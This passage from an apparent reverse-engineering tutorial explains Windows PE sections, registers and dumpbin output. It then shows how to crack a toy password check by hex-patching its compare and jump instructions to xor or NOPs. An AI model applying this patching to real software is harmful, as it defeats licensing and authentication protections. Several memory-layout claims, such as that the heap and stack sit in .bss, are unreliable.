But this myth about the read-only .text section is not fully true. There is a special case in which we can modify the machine instructions on the fly (while the process is in execution). This can be achieved with a special function, WriteProcessMemory, found in kernel32.dll. The kernel32.dll module is loaded in every process's memory space at a fixed memory location, but can be loaded manually at any other location with the help of a utility like rebase.exe, which comes with the Visual Studio SDK. Until Windows XP, the modules are loaded at fixed addresses in memory. But Windows Vista employs the ASLR security system (Address Space Layout Randomization), in which every module is loaded at a random address location every time the process is executed. This security system is already employed in a few other operating systems, so ASLR is not new to the hacker community. Fortunately a technique is there to thwart this security, in which the modules are not found by hard coded offsets; instead they are searched for with another technique and thus the address is located. So it really does not mean that the hacker will never find the address of WriteProcessMemory or any other needed function. Well, we leave this discussion here for later study.

The next section is the ".data" section. As the name suggests, this section contains the data required by the executing code. The initialized & relocatable variables are saved in this section. The .data section has the read & write attributes — but not execute, for the sake of security.

The next section is the .rdata section, which has the 'read only' attribute associated with it. The strings which are not assigned to variables but are printed, like in cout or printf functions in C++ — e.g. "Enter user name: " — will go in the .rdata section.

There may be other sections also, depending upon the size or type of the program. The next section we are going to discuss is the Bss. The Bss section is dynamically created on the fly during execution and can be divided into two parts:

1) Heap
2) Stack

Heap: The heap is also called the dynamic memory section. The memory functions like malloc() and new() are used to allocate memory dynamically for objects. The variables and objects which are created dynamically are saved into this part of memory.

Stack: The stack is also called the automatic memory section. The important thing about it is that at the low level, function arguments are mostly passed through it. It takes

23
part in the low-level machine instruction processing. The stack controls the function execution, through argument management. The implementation of the stack and heap is very important for understanding most of the worst kinds of attacks, e.g. the buffer overflow attack, off-by-one errors, etc. A special security feature called CANARY or COOKIE is implemented on the stack memory to thwart attempts to overflow the memory. But don't panic — we will discuss the ways to break such security.

The heap and stack are actually two subsections of a single memory section and they grow towards each other. In this approach both sections share the same block of memory, known as the bss section. The heap grows downwards, from lower memory addresses to higher memory addresses, while the stack grows upwards towards the heap, from higher memory addresses to lower memory addresses, thus approaching each other — as is clear from the figure. This approach of growing towards each other is very valuable to save precious memory.

The rest on stack and heap will be discussed in the next sections of our discussions. To check out the memory sections we can use the dumpbin.exe utility, supplied with most SDKs like Visual Studio etc.

24
Note: In order to get these tools, during the Visual Studio installation, when setup prompts for the environment registration, press OK, and you can avail the features of dumpbin.exe, cl.exe, link.exe, rebase.exe, windiff.exe, etc.

Most of the operating system's DLL files are found in the system32 folder or in the system32\dllCache folder. Let us see what dumpbin shows us about kernel32.dll:

Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.

Dump of file kernel32.dll

PE signature found

File Type: DLL

FILE HEADER VALUES
             14C machine (i386)
               4 number of sections
        3844D034 time date stamp Wed Dec 01 01:37:24 1999
               0 file pointer to symbol table
               0 number of symbols
              E0 size of optional header
            230E characteristics
                   Executable
                   Line numbers stripped
                   Symbols stripped
                   32 bit word machine
                   Debug information stripped
                   DLL

OPTIONAL HEADER VALUES
             10B magic #
            5.12 linker version
           5D200 size of code
           55800 size of initialized data
               0 size of uninitialized data
            C3D8 RVA of entry point
            1000 base of code
           59000 base of data
        77E80000 image base
            1000 section alignment
             200 file alignment
            5.00 operating system version
            5.00 image version
            4.00 subsystem version
               0 Win32 version
           B6000 size of image
             400 size of headers
           BF812 checksum
               3 subsystem (Windows CUI)
               0 DLL characteristics

25
           40000 size of stack reserve
            1000 size of stack commit
          100000 size of heap reserve
            1000 size of heap commit
               0 loader flags
              10 number of directories
           56440 [    5B54] RVA [size] of Export Directory
           5BF94 [      32] RVA [size] of Import Directory
           61000 [   50538] RVA [size] of Resource Directory
               0 [       0] RVA [size] of Exception Directory
               0 [       0] RVA [size] of Certificates Directory
           B2000 [    359C] RVA [size] of Base Relocation Directory
           5E0EA [      1C] RVA [size] of Debug Directory
               0 [       0] RVA [size] of Architecture Directory
               0 [       0] RVA [size] of Special Directory
               0 [       0] RVA [size] of Thread Storage Directory
           60740 [      40] RVA [size] of Load Configuration Directory
             268 [      1C] RVA [size] of Bound Import Directory
            1000 [     52C] RVA [size] of Import Address Table Directory
               0 [       0] RVA [size] of Delay Import Directory
               0 [       0] RVA [size] of Reserved Directory
               0 [       0] RVA [size] of Reserved Directory

SECTION HEADER #1
   .text name
   5D1AE virtual size
    1000 virtual address
   5D200 size of raw data
     400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         Execute Read

  Debug Directories
        Type       Size     RVA      Pointer
        ------     ------   ------   -------
        misc       110      00000000 B2C00
        Image Name: dll\kernel32.dbg

SECTION HEADER #2
   .data name
    1A30 virtual size
   5F000 virtual address
    1A00 size of raw data
   5D600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data

26
         Read Write

SECTION HEADER #3
   .rsrc name
   50538 virtual size
   61000 virtual address
   50600 size of raw data
   5F000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         Read Only

SECTION HEADER #4
   .reloc name
    359C virtual size
   B2000 virtual address
    3600 size of raw data
   AF600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         Read Only

  Summary
        2000 .data
        4000 .reloc
       51000 .rsrc
       5E000 .text

The above listing is the output of the command:

D:\WINNT\system32\>dumpbin /headers kernel32.dll

As we discussed earlier, there may be a different number of memory sections in each program (please don't use the word segment here, because a segment means a single process memory space; a segment is comprised of several sections). The number of sections is shown in the Summary block. There are a few important entries in this excerpt under OPTIONAL HEADER VALUES, which are:

    1000 base of code
77E80000 image base

27
Well, what's going on here, dudes? The value 77E80000 is the memory address where kernel32.dll is loaded for each process (this excerpt is taken from Windows 2000 Professional; in Windows XP it will be 7C800000 or whatever). Now, 1000 base of code tells us that the .text section, or the code, lies at an offset of 1000 from the image base. So we have the image base 77E80000; add 1000 to it: 77E80000 + 1000 = 77E81000 is the memory address from where the code starts in memory. But what lies between the image base and 0x77E81000 (the difference is 0x1000 = 4096 bytes)? The MZ and PE headers lie between these offsets.

In the same way we can calculate the other sections' addresses also. The offsets of all sections can be taken from the SECTION HEADER # headers: there is a field named virtual address which contains the offset for each section. Let's calculate the address of the .data section. For .data, the entry is:

SECTION HEADER #2
   .data name
    1A30 virtual size
   5F000 virtual address

The name of the section is .data. The virtual size of this section is 1A30 and the most required entry, virtual address, is 5F000. So for the .data section:

0x77E80000 + 0x0005F000 = 0x77EDF000

So 0x77EDF000 is the required address.

By identifying the OS type, any hacker can find out the image base of the important DLLs like kernel32.dll (which is loaded for every process) and can avail the dreadful features of the DLL and do anything as he wishes. This gives hackers a chance to develop and test an exploit on their own machines and then attack victim machines. It is really a big security problem. To complicate and strengthen the security in most secure environments, one must change these DLLs' image base offsets. Rebase.exe can do it, or it can be done manually with the help of a hex editor. But don't think that the security will be foolproof — the precautions are instead strong, but hackers use the most sophisticated approaches, which can side-step such precautions also; we will discuss such techniques later under the writing shellcode section. Remember that by default every process in memory starts at

28
a fixed address each time, and each module loaded by it also loads itself at a fixed address (in Win 2000, XP, etc., but not in Vista, due to ASLR security). But administrators or developers can also randomize these addresses on their own wish, for extra security measures.

For developers' attention: for extra security of their program's structure, so that hackers cannot reveal the internal structure of their program, encrypt the program using an encryption and decryption mechanism, and displace the static data or other things by placing them in other sections. This can be achieved in C++ using #pragma data_seg (".vinnu"). Let's do it practically:

/* newsec.cpp */
#include <iostream>
#include <cstdlib>
using namespace std;

#pragma data_seg (".vinnu")  // the '.' may be omitted, but keep it as convention.
/* everything defined inside this section goes to the newly created
   section ".vinnu" */
int a = 49;
char array[] = "vinnu! JaiDeva!!!";
#pragma data_seg ()  // the rest will go in the default data section.
/* again everything defined will go to the default sections. */

int main (int argc, char* argv[])
{
    cout << "The integer is: " << a << endl;
    cout << "The buffer is: " << array << endl;
    system("PAUSE");
    return EXIT_SUCCESS;
}

29
To compile the above program, if you have Visual Studio, then at the command console give the command:

Cl /Gs newsec.cpp

Well, by compiling with the above method the compiler does not insert the ugly stack protection calls and optimizations; thus a smaller code is generated. Or you can also compile it conventionally in the GUI by pressing "F7" and then "CTRL + F7" keys. In this way the exe file is generated inside a directory named "Debug".

Then at the command prompt give the command:

Dumpbin newsec.exe

The dumpbin output is:

        4000 .data
        3000 .rdata
       11000 .text
        1000 .vinnu

Well, we have created a section named '.vinnu'. Now let us check whether it contains those variables or not. To do so, give the command:

Dumpbin /section:.vinnu /rawdata:bytes newsec.exe >nsvinnu.txt

The output is stored in a file named nsvinnu.txt and is:

Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.

Dump of file newsec.exe

File Type: EXECUTABLE IMAGE

SECTION HEADER #4
  .vinnu name
      16 virtual size
   19000 virtual address
    1000 size of raw data
   17000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         Read Write

30
RAW DATA #4
  00419000: 31 00 00 00 76 69 6E 6E 75 21 20 4A 61 69 44 65  1...vinnu! JaiDe
  00419010: 76 61 21 21 21 00                                va!!!.

  Summary
        1000 .vinnu

Yes! We've got it — so we have now found what we were looking for in the newly created section. But where is the integer a = 49? Well, carefully view the hex dump. The hex value just after 00419000: is 31. Now open the calculator, select the hex radio button, type 31 and convert it into decimal: the value will be 49. Then the array buffer starts with the hex equivalents 76 69 6E (i.e. v i n).

Actually we have transported these contents to a different section than the conventional one. Normally, no one suspects these sections for initialized variables. This technique is used to hide the important parts of software, like the arguments of a protection mechanism, secret passwords, etc. It will make code analysis somewhat difficult. But we cannot be sure that the hidden arguments will stay hidden anymore: just as we found them in the newly created section, similarly it's not difficult for a hacker to find them. For more security, use special characters like "ALT + 255" from the num keypad in section names (insure that 'Numlock' is on).

But remember that if we prototype any function in any custom section in this way, even then the executable code will be transferred to the .text section, while only the static data will be placed in the newly created section. So, while breaking program codes you must review all the associated sections, not only .text and .rdata — better if you dump all sections into text files with the above method. We will be analyzing the protection mechanisms in the next sections.

31
Assembly Instructions

Before we get indulged into protections and the disassembled instructions, it's time to cram some of the assembly instructions and what they are meant for. Well, don't panic friends — we are not going to land you in a low-level assembly environment directly without knowing their meaning. First of all, remember that we need only a few assembly instructions (maybe 5 to 6, or nearly finite). Believe us friends, we ourselves cannot write fully functional programs in assembly, but we can understand what is going on. So it's somewhat understandable what is going on even if we are not assembly specialists. So let us review some instructions:

Instruction     Meaning
1) push         pushes the contents on top of the stack.
2) pop          pops out the contents from the top of the stack.
3) jmp          an unconditional jump.
4) xor          Exclusive OR operation on a couple of registers.
5) call         calls a function. After the called function finishes its
                job, it returns the control to the instruction next to
                the one which called it.
6) mov d, s     moves the contents of s into d.
7) test         compares two values for equality (it performs a bitwise
                AND to set the flags, commonly used to test for zero).
8) cmp          checks two values for a logical relation like equal,
                greater, lesser, etc., depending upon the operator used.

Now it's time to learn about some of the general purpose registers. Registers are the blocks of the processor itself.

32
Registers work synchronously, so in order to optimize the speed of a program, the registers should be used as much as possible rather than the stack or other memory locations, because it is faster to work at CPU clock speeds of the order of GHz than at memory speeds of a few hundred MHz, which is several times less than the processor's.

That is why function inlining is done in C++. In inlined functions the function call is not made to another location; instead, the code of the function is inserted into every location where it is needed. That is why inlined software has a larger size than its non-inlined counterpart. Also, inlined code is not always the same everywhere it is inserted; therefore it sometimes creates a nuisance for code diggers.

33
The Realm of Registers

The registers are the lowest storage levels used for instruction processing. These registers are parts of the CPU itself. Every processing is done with the help of these parts of the CPU; the instructions use these registers to accomplish their job. Every register has a specially assigned job, but they can be used for other tasks as well. The latest technologies demand an overwhelming amount of processing and state management; therefore, new processors are equipped with lots of specialized registers.

The 32-bit general-purpose registers are EAX, EBX, ECX, EDX, EDI, ESI, ESP, EBP, EFL, EIP. All these 32-bit registers are the 32-bit incarnations of the 16-bit AX, BX, CX, DX, etc. In all registers the 'E' stands for 'Enhanced'. Cram the chart given below:

REGISTER   DESCRIPTION
--------   -----------
EAX        Work house, return values, syscall no.
EBX        Base address, arguments
ECX        Counter, arguments, 'this' pointer
EDX        Data
EDI        Destination index
ESI        Source index
ESP        Stack pointer
EBP        Stack frame base pointer
EFL        Flags
EIP        Instruction Pointer

These are the general usages of the general-purpose registers in different operating systems. Remember, the use of registers also depends upon the compiler and the operating system. In Linux the EAX register is used to store the system call number, EBX is used for the first argument, and ECX stores the second argument for the called function. ESP, or the stack pointer, stores the address of the top of the stack frame, and EBP stores the stack frame base pointer. The EIP register stores the address of the instruction to be executed. But if we have to use only half of a 32-bit register, then

34
these registers will be divided as AL (the lower byte of AX), AH (the higher byte of AX), CL, etc. Among all of these registers, we have to concentrate on EIP (Enhanced Instruction Pointer). This register contains the pointer to the instruction ready for processing. Thus, if by any means we can control this pointer in the EIP register, then we will have control over the CPU of the victim machine. By modifying the EIP — if we fill it with the address of a buffer which is controlled by us and is filled with machine code — the processor will ultimately be derailed from its normal execution and will execute the code supplied by us. This is the way the buffer overflow attack works. We will discuss it in the Buffer Overflow section, and if anything strange is introduced later in the discussions, we will try with all efforts to explain it there. It is enough with registers now. Friends! It's time to move further.

35
Compiling Action

What happens during the compiling action? Well, generally the compiler digests the high level program code into machine code (the hex dump, also called the opcode or operational code), and then its job finishes; now the linker comes into action. It appends the code generated by the compiler with the code of all the related library functions necessary to execute the programmer's code. As a result, nearly all library functions get concentrated at the bottom of the compiled program, and the opcode gets placed near the top of the executable file.

Now a simple question: what part of a program gets the control first when the program is executed? Most programmers' answer will be main() or winmain(), with no doubt. Wrong! Absolutely wrong! The startup code gets the control first; then, after its job is done, it transfers the control over to main or winmain (or DllMain in DLL files). Also remember that in most of the cases the functions which are defined first get compiled first, and therefore are inserted even earlier than the main() or winmain() functions' opcode. These things will help us immensely in analyzing the code.

36
Pseudo Protection Code

Now it's time to indulge into real action. Let us consider an example of a typical protection system employed in most kinds of security mechanisms. The stepwise actions are as follows:

1) The initialization of the program or system occurs.
2) The program or the system then transfers control to the security protection system.
3) The security system throws a challenge against the user, or against another program which initiated it. The challenge may be in the form of a login userID and password, a file, or a physical property or object possessed by the user, like a smartcard or disk, retinal scan, finger prints, voice recognition system, etc.
4) The user responds to the challenge with his possession of the part of security, like userID, password, diskette, file, etc.
5) The user-supplied credentials undergo a cryptographic change.
6) The secret security token file, which is a part of the security subsystem, is obtained into the memory.
7) The crypt obtained from the user credentials is then matched against the security token file.
8) If the match is found, then
9) Jump to the next section, where the necessary tokens are generated and the system execution is started with the necessary privileges, according to the generated tokens.
10) If the match is not found, then the login failed message is thrown to the user &, if necessary as defined by the programmer,
11) Jump to the section in which the program passes the control to the execution termination code.
12) The program is terminated.

It is not necessary that all steps are programmed in the software. But these steps are the average security measures; below them, security is rated as poor. Now the steps 8, 9, 10 and 11 are important for us, although step 4 is also important. Then, the tracing of the original secret passwords can be done by starting the

37
tracing from step 4. Now, we have to consider the jumps at step 9 and step 11. There are also other methods to crack the protection mechanism. Think about all the possibilities to crack this security:

1) If we interchange the jump addresses with each other, then the original credentials will be denied and the wrong ones will get authenticated as legal ones.
2) If we search for the address of the string "login failed", which we can get from the .data section, then we will land directly in the section which gets control after the jump at step 11.
3) If we change the if condition — its assembly equivalent is test or cmp (depending on the operators used) — by changing test (hex value 0x85) to xor, which has hex value 0x33, then the security check will always be passed OK, irrespective of the credentials supplied (because xor always zeros out a register if it is xored with itself, the test returns zero, and the jump after the test condition is taken accordingly).

This will get clear practically.

Note: we are compiling the program's code in Visual C++ 6.0. All compilers compile the code differently and thus generate different machine code, but it is advised that you also compile the code in different compilers and try to analyze the code.

38
Tools of the Trade or RootKit

The toolkit used by hackers is known as the tools of the trade, or also the rootkit. Before indulging into real action we need some software tools. In all advanced protection cracking techniques, a minimum of three tools is essential: a hex editor, a debugger for the dynamic tracing of the security protection, and a disassembler or decompiler.

A hex editor is used because executable files are nothing more than machine signals, and as we all are familiar, machine signals are nothing more than the binary numbers 0 and 1, and in turn these binary digits form hex numbers (base 16). Any hex editor can be used, but HHD is freely available and is freely licensed to distribute as much as you can.

We also need a debugger. Actually, a debugger is helpful in finding the logical errors or bugs, but here it will be used for a different purpose. Most of the hackers use SoftICE, IDA, etc. But they cost thousands of rupees, or the price may grow to more than a lakh rupees, and most of us are not financially strong enough to buy them. The charm of these tools is that they can do most of our time consuming jobs much more easily, in just flickers. But remember, we are not going to make you script kiddies (the one who uses others' tools and doesn't know how the things are going on, and also doesn't know the aftermaths of using such tools). We will not use any automatic tools here, nor any dirty tricks, but a much deeper approach. Our approach will rely on a much more reliable tool which is freely available to all of us — don't wonder, its name is the brain.

Our rootkit is composed of DUMPBIN, which is available with most of the SDKs like Visual Studio; the HHD hex editor; and the debugger in use will be the one included in Visual Studio, i.e. VC++ itself. All these are available on a development system. This debugger is not friendly with code breakers, as it does not provide memory searching tools etc. Finally, till date no decompiler or disassembler can reverse engineer any program back to its original form in high level language code; it can generate only a low level code, which is hard to understand. But who can stop learning hands?

The Code Breaking Methods

Three methods are basically applied for code analysis. These are:

1) Static code analysis
2) Dynamic code analysis
3) Fusion analysis

In the static method, the code is not executed; instead its static disassembled assembly and hex dump are analyzed, maybe in the form of text files, with the help of a hex editor. This method is pretty useful in analyzing the code of programs which employ the anti-debugging techniques. But this method has several limitations: a search for user-passed strings cannot be done, as the code is not executed or traced, and if the code is encrypted and can only be decrypted during execution, then this technique again cannot be employed.

In dynamic code analysis, the code is executed under a debugger's control. Breakpoints are employed at suspected instructions or places. The tracing of the protection mechanism is somewhat easier than in the static method. But this technique also falls if the developers employ anti-debugging techniques in their code.

The third method, fusion analysis, is composed of both of the above listed techniques, which are employed side by side. This technique is useful in analyzing the code which employs every kind of protection of the code itself, like checksum calculation, encryption, and anti-debugging techniques.

But the battle does not end here: developers can use techniques by which they can still engage a hacker and derail him from the protection mechanism into junk code etc. Yet developers must keep in mind that they cannot stop a dedicated hacker from breaking their protection mechanism. Also, developers should not imagine that their software is not so important and so will not be broken: young hackers can spend several weeks in breaking even older programs which are not used nowadays, but are still of much use for practice.

40
Well, it does not mean that hackers are a spoilt part of our culture; instead they cause the advancement in technology and thus evolve new protection mechanisms. It's not a war between the developers and hackers, but a necessary part of an advanced, technology-conscious society.

41
Real Action

Let us start it practically now. We are going to construct a simple security featured program which will ask for a password. If the password matches ("iAMsatisfied" will be the password in this example), the program starts a new command console; if it does not match, it will show a login failed message and give three chances, and if all chances are failed then the program terminates. Here is the code:

/* secpass.cpp */
#include <iostream>
#include <cstring>
#include <cstdlib>
using namespace std;

int main (int argc, char* argv[])
{
    char password[] = "iAMsatisfied";
    char buffPass[21];

    for (int a = 1; a <= 3; a++) {
        cout << "Enter the password: ";
        cin.getline(buffPass, 21);
        if (strcmp (password, buffPass) == 0) {
            system("START");
            exit(0);
        } else {
            cout << "Login failed." << endl;
        }
    }
    return EXIT_SUCCESS;
}

Compile this program as usual, with debugging info for your own understanding, with the help of the Software Development Kit's compiling settings. But we are compiling this program in such a way that the compiled code and decompiled code will contain no trail of any original high level code. Let us do it at the command prompt:

c:\code>cl /Gs secpass.cpp

Here code is the folder containing the file secpass.cpp. Now run the secpass.exe file. If you compile it from

42
If you compile it from the graphical interface of Visual C++ 6.0, the exe goes into the Debug directory by default, but since we compiled it with CL, the exe is created in the same directory. Now run it. It asks for a password: if you supply "iAMsatisfied" it matches and starts a new console, and if not, the login-failed message is displayed. Well, here you know the password, but think: if you didn't, how would you crack the security?

First, use dumpbin to list the sections of the exe file:

C:\code>dumpbin secpass.exe
Dump of file secpass.exe
File Type: EXECUTABLE IMAGE
Summary
    4000 .data
    3000 .rdata
    F000 .text

Well, only three sections. Now dump the .data section as raw data:

C:\code>dumpbin /section:.data /rawdata:bytes secpass.exe >secpassdat.txt

The output is redirected to the file secpassdat.txt. In a part of this file (shown in the book's screenshot), the leftmost column contains the address offsets, the middle columns the hex equivalent of each character (16 bytes per row), and the rightmost column the data itself. Now disassemble secpass.exe:

C:\code>dumpbin /disasm secpass.exe >secpass.txt
Now, in the data-section text file, search for the string "Enter the password:" and note down the offset of its first character. It is 004130C0. In the same way, search for the string "Login failed" in secpassdat.txt; its offset is 004130E0.

Now search for these data offsets in the disassembled file using notepad's Find, but omit the first two zeros for better efficiency. Searching for "4130C0", the result is at offset address 004010BE; searching for "4130E0", we find 0040110D in our case (you may get different addresses). The protection mechanism must lie somewhere between these two offsets, that is, between 004010BE and 0040110D. We are displaying only the important part of the code here, with explanations inserted in lines starting with ';' (the procedure is mostly the same for every compiler):

_main:
0040107E: 55                 push ebp                 ; prologue of main()
0040107F: 8B EC              mov ebp,esp
00401081: 83 EC 2C           sub esp,2Ch
00401084: A1 B0 30 41 00     mov eax,[004130B0]       ; the stored password string is
00401089: 89 45 D4           mov dword ptr [ebp-2Ch],eax  ; copied onto the stack,
0040108C: 8B 0D B4 30 41 00  mov ecx,dword ptr ds:[004130B4h]  ; dword by dword
00401092: 89 4D D8           mov dword ptr [ebp-28h],ecx
00401095: 8B 15 B8 30 41 00  mov edx,dword ptr ds:[004130B8h]
0040109B: 89 55 DC           mov dword ptr [ebp-24h],edx
0040109E: A0 BC 30 41 00     mov al,[004130BC]
004010A3: 88 45 E0           mov byte ptr [ebp-20h],al
004010A6: C7 45 E4 01 00 00  mov dword ptr [ebp-1Ch],1    ; counter a = 1
          00
004010AD: EB 09              jmp 004010B8
004010AF: 8B 4D E4           mov ecx,dword ptr [ebp-1Ch]  ; for-loop increment
004010B2: 83 C1 01           add ecx,1                    ; section: counter + 1
004010B5: 89 4D E4           mov dword ptr [ebp-1Ch],ecx
004010B8: 83 7D E4 03        cmp dword ptr [ebp-1Ch],3    ; for-loop condition section:
                                                          ; is the counter above 3?
004010BC: 7F 6A              jg 00401128                  ; if greater than 3, jump to
                                                          ; the exit section ("return
                                                          ; EXIT_SUCCESS" in the code)
004010BE: 68 C0 30 41 00     push 4130C0h                 ; "Enter the password: " is
                                                          ; pushed on the stack here
004010C3: 68 70 4C 41 00     push 414C70h
004010C8: E8 D3 13 00 00     call 004024A0                ; probably a call for cout or
                                                          ; printf, which can print a
                                                          ; string on the console
004010CD: 83 C4 08           add esp,8                    ; clears from the stack the
                                                          ; bytes used by the preceding
                                                          ; function's arguments
004010D0: 6A 15              push 15h                     ; 15h = 21 decimal, the size
                                                          ; of the buffPass array
004010D2: 8D 55 E8           lea edx,[ebp-18h]
004010D5: 52                 push edx
004010D6: B9 00 4D 41 00     mov ecx,414D00h
004010DB: E8 F0 02 00 00     call 004013D0    ; this function is provided the pointer
                                              ; to buffPass[], so it may be cin or
                                              ; getline ([ebp-18h] points to buffPass)
004010E0: 8D 45 E8           lea eax,[ebp-18h]
004010E3: 50                 push eax
004010E4: 8D 4D D4           lea ecx,[ebp-2Ch]
004010E7: 51                 push ecx
004010E8: E8 73 47 00 00     call 00405860    ; both passwords are pushed: one is the
                                              ; string typed into buffPass[], the
                                              ; other the stored string (loaded from
                                              ; [0x004130B0] back at offset
                                              ; 0x00401084). A comparison is going on.
                                              ; Bingo! We are at the heart of the
                                              ; protection mechanism.
004010ED: 83 C4 08           add esp,8        ; this time 8 bytes are cleared for the
                                              ; same reason (earlier it was 4 bytes)
004010F0: 85 C0              test eax,eax     ; the comparison result was returned in
                                              ; eax; test sets the zero flag if eax
                                              ; is zero, i.e. the strings were equal
004010F2: 75 14              jne 00401108     ; if the password does not match, jump
                                              ; to the login-failed section
004010F4: 68 D8 30 41 00     push 4130D8h     ; the string "START", an argument to
                                              ; the system() function
004010F9: E8 BD 46 00 00     call 004057BB    ; the call to system()
004010FE: 83 C4 04           add esp,4        ; one word (the pointer) is removed
                                              ; from the top of the stack

The jne actually checks the eax contents: if eax is zero the jump is not taken and execution falls through to the next instruction, equivalent to the IF condition in the source. The login-failed section at 00401108 is entered after pushing the address of the string "Login failed" onto the top of the stack. In order to break the check we can either change jne to je (then a wrong password will get past the security check while the legal one will fail), or change the test to xor (eax gets xored with itself and its contents become all zeros, so the jne is never taken), or change the jne to nop so that no action takes place at all.

0040111C: 83 C4 08           add esp,8
0040111F: 8B C8              mov ecx,eax
00401121: E8 4A 00 00 00     call 00401170
00401126: EB 87              jmp 004010AF
00401128: 33 C0              xor eax,eax      ; the return value of main() is being
                                              ; prepared in eax (typically a zero, as
                                              ; XOR fills the register with zeros)
0040112A: 8B E5              mov esp,ebp
0040112C: 5D                 pop ebp
0040112D: C3                 ret

Now the hex editor comes onto the scene. Open the secpass.exe file in a hex editor. Keep in mind that the addresses in the hex editor will not start with 0x00401000 but with 0x00000000; the instruction at 0x00401000 in the disassembly sits at file offset 0x00001000. Now scroll down to address 0x000010F0 and you will find the hex values 85 C0 75 14 68. Change 85 C0 75 14 to 90 90 90 90 (90 is the hex code for NOP, the no-operation instruction; the processor just steps to the next instruction). Save the changes to another file named secnop.exe and execute it. What happened? Aha! The program starts a command shell irrespective of whatever password is typed. We broke the security mechanism.

Now we will do the same by another method. Again open the original secpass.exe in the hex editor, or undo the changes in the already open copy. Just change 85 C0 to 33 C0, turning the test into an xor. Save the file as secrack.exe. Now execute secrack.exe and intentionally pass it a wrong password, anything other than "iAMsatisfied". Well, we did it again.

Isn't it interesting? Now think about some other methods to crack the same code again. Keep in mind that the security mechanism will not be so simple everywhere, and passwords are not matched in clear text every time. Instead, a hash code is generated and then compared with an authoritative hash, which may sit in the code or in an external security file; but anyone can change that security file or authoritative hash, so developers must also arrange some features for securing these parts of the security mechanism.
Now it is time to understand a few more things encountered in the above program. Consider the instruction:

00401081: 83 EC 2C           sub esp,2Ch

This instruction reserves 44 bytes on the stack. The address of the top of the stack is preserved in the ESP register, and the stack grows from higher memory addresses to lower memory addresses, toward the heap, to save precious limited RAM. So subtracting something from ESP makes the address lower than the earlier address, which means the stack memory is increased. Remember: if the address decreases, the stack grows.

Now consider the following instruction:

004010FE: 83 C4 04           add esp,4

This instruction clears the stack and shrinks the stack memory by 4 bytes: the address in ESP gets increased to a value 4 higher, so one dword is removed from the top of the stack. Remember: if the address increases, the top of the stack moves back up (the stack shrinks).
Now one more thing before proceeding further. All in all, every program is just a user interface, and everything processed by the program is actually done by the operating system, which exposes an API (application programming interface). Whatever coding you do, in whichever language, gets converted into the operating system's API calls: most programming functions correspond to their counterparts in dynamically loaded libraries (DLLs), which carry these API calls. Now the questions are: how do we know which API functions are called by a program, and, in the case of libraries, which functions are available for sharing? Both questions can be answered by DUMPBIN. Check the following command:

C:\code>dumpbin /imports secpass.exe >secimp.txt

The command's output is redirected to the text file secimp.txt; open it and read it:

Section contains the following imports:
    KERNEL32.dll
        410000  Import Address Table
        4121C0  Import Name Table
             0  time date stamp
             0  Index of first forwarder reference
        1E4  MultiByteToWideChar
        2D2  WideCharToMultiByte
         7D  ExitProcess
        29E  TerminateProcess
         F7  GetCurrentProcess
        22F  RtlUnwind
        20B  RaiseException
        19F  HeapFree
         CA  GetCommandLineA
        174  GetVersion
        199  HeapAlloc
        1A2  HeapReAlloc
        1BF  LCMapStringA
        1C0  LCMapStringW
         BF  GetCPInfo
         21  CompareStringA
         22  CompareStringW
        1A3  HeapSize
        11A  GetLastError
        10D  GetFileAttributesA
        28B  SetUnhandledExceptionFilter
        19D  HeapDestroy
        19B  HeapCreate
        2BF  VirtualFree
        2BB  VirtualAlloc
        1B8  IsBadWritePtr
        2AD  UnhandledExceptionFilter
        124  GetModuleFileNameA
         B2  FreeEnvironmentStringsA
         B3  FreeEnvironmentStringsW
        106  GetEnvironmentStrings
        108  GetEnvironmentStringsW
        26D  SetHandleCount
        152  GetStdHandle
        115  GetFileType
        150  GetStartupInfoA
        2DF  WriteFile
        26A  SetFilePointer
         AA  FlushFileBuffers
         1B  CloseHandle
        1BE  IsValidLocale
        1BD  IsValidCodePage
        11C  GetLocaleInfoA
         77  EnumSystemLocalesA
        171  GetUserDefaultLCID
        175  GetVersionExA
        13E  GetProcAddress
        126  GetModuleHandleA
        153  GetStringTypeA
        156  GetStringTypeW
        10B  GetExitCodeProcess
        2CE  WaitForSingleObject
         44  CreateProcessA
        1B5  IsBadReadPtr
        1B2  IsBadCodePtr
         B9  GetACP
        131  GetOEMCP
        1C2  LoadLibraryA
        218  ReadFile
        27C  SetStdHandle
        262  SetEnvironmentVariableA
        11D  GetLocaleInfoW

Summary
    4000 .data
    3000 .rdata
    F000 .text

The above output shows that KERNEL32.dll is loaded every time and the listed functions are imported from it. Carefully examine the lines:

         21  CompareStringA
         22  CompareStringW

The two functions listed above, as the names indicate, deal with strings. Strings can be of two types, either ASCII or Unicode. An ASCII character occupies 8 bits, so the ASCII set is limited to a character space of 2^8 = 256, while a Unicode character can occupy 16 bits (2 bytes), hence it can accommodate the alphabets of all the world's languages in a larger character space of 2^16 = 65536. Carefully watch the names of these two functions: they differ in the last character, A and W. Functions which handle ASCII characters are suffixed with 'A', while those handling Unicode strings are suffixed with 'W'.

In a similar way, to know which functions a DLL can export to other programs, use the '/exports' switch in dumpbin. Let's see what is available in kernel32.dll:

C:\WINDOWS\system32>dumpbin /exports kernel32.dll >c:\dump\kernelxpo.txt

Here we redirected the output to a text file named kernelxpo.txt in a folder named dump on the c: drive; there will be a huge list. Check it out. This file is also very important in security analysis, and in the next discussions we will need it and a few of these API functions. In the same way, save the exports of USER32.dll in a text file.

